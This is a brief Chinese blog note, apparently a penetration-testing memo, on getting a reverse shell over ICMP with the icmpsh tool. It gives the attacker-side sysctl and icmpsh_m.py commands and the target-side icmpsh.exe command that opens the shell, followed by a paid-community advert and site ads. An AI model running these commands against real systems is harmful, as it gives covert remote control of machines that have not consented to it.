ICMP shell
场景
反向shell的场景下使用
原理
ICMP作为获取反向shell的通道
实践
运行 run.sh报错,可能是因为用的Parrot。改一下就可以了
ifconfig | grep 'inet '| grep -v '127.0.0.1' | awk '{ print $2}'
或者直接运行主要命令。
攻击者机器运行:
sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null
python icmpsh_m.py 攻击机ip 目标机ip
目标机运行:
icmpsh.exe -t 攻击机ip -d 500 -b 30 -s 128
代码
VS2013编译通过icmpsh-s.c
https://github.com/inquisb/icmpsh
效果
===========================================================
一个独立安全研究员,自由职业者的知识星球《公鸡队之家》,一边研究技术,一边分享到星球,一边养活自己,我们都有一颗好为人师的心,赠人玫瑰,手留余香。星球的价格是199¥/年。希望大家赏光,加入二维码在文末。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步